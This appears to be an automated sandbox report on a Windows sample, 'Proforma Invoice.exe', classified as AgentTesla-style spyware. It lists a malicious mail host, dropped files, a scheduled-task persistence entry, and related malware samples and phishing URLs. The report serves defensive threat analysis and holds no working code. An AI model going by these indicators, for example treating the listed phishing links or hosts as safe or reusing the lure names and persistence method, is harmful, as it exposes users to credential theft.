                        C:\Users\user\AppData\Roaming\VoAlKljQu.exe65%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        mail.elec-qatar.com2%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                        http://mail.elec-qatar.com0%Avira URL Cloudsafe
                        http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        http://mail.elec-qatar.com2%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/01%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ipify.org
                        172.67.74.152
                        truefalse
                          high
                          mail.elec-qatar.com
                          50.87.139.143
                          truetrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bTheProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://account.dyn.com/Proforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers?Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.tiro.comProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designersProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.org/tProforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0Proforma Invoice.exe, VoAlKljQu.exe.0.drfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sajatypeworks.comProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.typography.netDProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn/cTheProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://api.ipify.orgProforma Invoice.exe, 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cnProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://mail.elec-qatar.comProforma Invoice.exe, 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 2%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8Proforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fonts.comProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 1%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProforma Invoice.exe, 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.4093089949.0000000003081000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, VoAlKljQu.exe, 0000000D.00000002.4093089236.0000000002BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sakkal.comProforma Invoice.exe, 00000000.00000002.1689913289.0000000006692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        50.87.139.143
                                                        mail.elec-qatar.comUnited States
                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                        172.67.74.152
                                                        api.ipify.orgUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                        Analysis ID:1399273
                                                        Start date and time:2024-02-27 08:26:06 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 10m 15s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:18
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:Proforma Invoice.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 187
                                                        • Number of non-executed functions: 26
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        TimeTypeDescription
                                                        07:26:56Task SchedulerRun new task: VoAlKljQu path: C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                        08:26:54API Interceptor8476760x Sleep call for process: Proforma Invoice.exe modified
                                                        08:26:56API Interceptor28x Sleep call for process: powershell.exe modified
                                                        08:26:59API Interceptor6562678x Sleep call for process: VoAlKljQu.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        50.87.139.143SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                    z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                      PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                        SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                          SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                            172.67.74.152Doc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                              EGF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                BCAF23090415-FA-INV.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  Mokejimas,jpeg.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    Lecture6.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        rScaned_Product_Attached_Document.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                          rCompany_Profile.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            https://m.exactag.com/ai.aspx?tc=d9bc40b07205bbd26a23a8d2e6b6b4f9&url=//secureyouerinfos.com/fhffdgg/sdssasas/mygsi/Y2FybGEuZ2luZXJAYXhhY3Rvci5jb20=Get hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                                              https://c8ke.com/auxxxxpdfGet hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                mail.elec-qatar.comSecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.139.143
                                                                                                z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                PO_0130717.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Win32.RATX-gen.20501.5539.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 50.87.139.143
                                                                                                SecuriteInfo.com.Win32.PWSX-gen.27494.29811.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                • 50.87.139.143
                                                                                                api.ipify.orgDoc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                • 172.67.74.152
                                                                                                http://accedii.194-48-251-87.cprapid.com/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.26.12.205
                                                                                                http://web.logodesign.net/preview/8bf6d88a?device=desktopGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.26.13.205
                                                                                                Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                NEW PO (PO01-240111).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                NEW PO (PO01-26022024).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                EGF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 172.67.74.152
                                                                                                BCAF23090415-FA-INV.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 172.67.74.152
                                                                                                IMG_FIZETES_FEB26_IMG.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 104.26.12.205
                                                                                                Mokejimas,jpeg.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 172.67.74.152
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                UNIFIEDLAYER-AS-1UShttps://kgp.xfi.mybluehost.me/wp-content/upgrade/maiil/home2/home/support/net/login.phpGet hashmaliciousUnknownBrowse
                                                                                                • 50.87.231.172
                                                                                                Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.150.204
                                                                                                https://lookerstudio.google.com/s/pmOrPFC9q6EGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 192.185.182.159
                                                                                                https://api.spently.com/api/spently/click?id=105133&store=hotelcollection&type=OI&cid=6272440696998&url=amoreex.com/Encinacapital/%23anJlc3NhQGVuY2luYWNhcGl0YWwuY29t%2F%3Futm_source%3DDatabase%26utm_medium%3DEmail%26utm_campaign%3DLisini%2520eGiftsGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 108.179.193.93
                                                                                                https://tracker.club-os.com/campaign/click?99559ms99559gId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=https://blicblac%E3%80%82com/#grhrbmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==??kqysne&buhpvbdd/q4vJwGLrOcjgXKyw/t7FqNJad60pBYUT2uZA8g6vHQqWz//bmVlbHkuZWRkbGVzdG9uQGFtY25ldHdvcmtzLmNvbQ==&https://instagram.comGet hashmaliciousFake Captcha, HTMLPhisherBrowse
                                                                                                • 192.185.148.81
                                                                                                https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=qaryaconnect.com/content/6f94e370dff0d5fa0ea5bb98441b64c7/alT1ZF/c2FsZXNub0Bjb2dlbnQtcG93ZXIuY29tGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 192.185.112.131
                                                                                                IPELLUZ1_2024-02-26_11_26_26.699.zipGet hashmaliciousUnknownBrowse
                                                                                                • 192.185.106.74
                                                                                                payment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                • 50.116.112.104
                                                                                                ORDER #25376283982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 50.87.150.204
                                                                                                https://lkp.xxm.mybluehost.me/BV/UI/info/?=ConfiramtioneoXtJ-MYYPfaH1:1bIbB0-M2xC4bXfJ5QXJNpJF7mAmVlmM0Iildhs5221VvLJdP4ooIfTjxGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 50.87.219.149
                                                                                                CLOUDFLARENETUSQuotation Drawing Specification.exeGet hashmaliciousRemcosBrowse
                                                                                                • 172.67.200.220
                                                                                                BBKKOUO PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                • 172.67.177.75
                                                                                                Doc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                • 172.67.74.152
                                                                                                http://document-85cc2.web.appGet hashmaliciousUnknownBrowse
                                                                                                • 104.26.5.119
                                                                                                https://docs.google.com/forms/u/0/d/e/1FAIpQLSe7q5ELD0ukHZ7E6KcHXkiDMqI8vRMEd1vxtrUgZ3-pPemPWQ/viewscore?vc=0&c=0&w=1&flr=0&viewscore=AE0zAgD_gSPU3bQwis0na0pzUXbgBAd1xpQtr8HDV7R55sQZ0C5IFM4azxVqGdNtN9k8HUMGet hashmaliciousGRQ ScamBrowse
                                                                                                • 172.67.12.83
                                                                                                xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                • 104.21.94.2
                                                                                                https://netorg5340145-my.sharepoint.com/:b:/g/personal/info_curreg_com/EZSUhMT59IlCp8Kk3FQpxOYBrWtNELH-5C2z2AFosN0--g?e=qYrYWhGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.17.2.184
                                                                                                https://www.ungrbly.cn/Get hashmaliciousUnknownBrowse
                                                                                                • 104.18.36.155
                                                                                                https://cloudflare-ipfs.com/ipfs/bafkreidireckoznexfjfbsxswt7f6nvtvuhh43w7uthmbwiqbpqvcwfpnyGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 104.17.64.14
                                                                                                https://www.qiodwbu.cn/Get hashmaliciousUnknownBrowse
                                                                                                • 104.18.36.155
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eDoc-0113687pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                • 172.67.74.152
                                                                                                Scanned-Statement_Pov03499727628966122376398775274656600052690463249885.wsfGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://www.ungrbly.cn/Get hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                https://libbycolon.autos/serene/dune/?box=violetGet hashmaliciousTechSupportScamBrowse
                                                                                                • 172.67.74.152
                                                                                                https://en-us.secureconnection.moneytransaction.kb4.ioGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.74.152
                                                                                                Arrival Notice.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 172.67.74.152
                                                                                                bTHf.exeGet hashmaliciousNjratBrowse
                                                                                                • 172.67.74.152
                                                                                                bTGj.exeGet hashmaliciousNjratBrowse
                                                                                                • 172.67.74.152
                                                                                                bTHf.exeGet hashmaliciousNjratBrowse
                                                                                                • 172.67.74.152
                                                                                                bTGj.exeGet hashmaliciousNjratBrowse
                                                                                                • 172.67.74.152
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                Process:C:\Users\user\AppData\Roaming\VoAlKljQu.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2232
                                                                                                Entropy (8bit):5.380192968514367
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:+LHyIFKL3IZ2KRH9OugYs
                                                                                                MD5:9AA3EC09E507E3B6521730FDDCF550A3
                                                                                                SHA1:19E688C78EB2FBE0D620C0055293DA06411512D0
                                                                                                SHA-256:E50F69B84C0E4B5D2CFE80C5B7B4AF6398A862F098D06B138388F7D49ABAB0B8
                                                                                                SHA-512:04B3A49C7FB0DFFF413095AB046296C779A1978D64CDAE35858435A5E41221AE6726421F1FB116EBF7E2DB314602A544F5C8AD7F0F96FCC04D694AD6C1E78E81
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
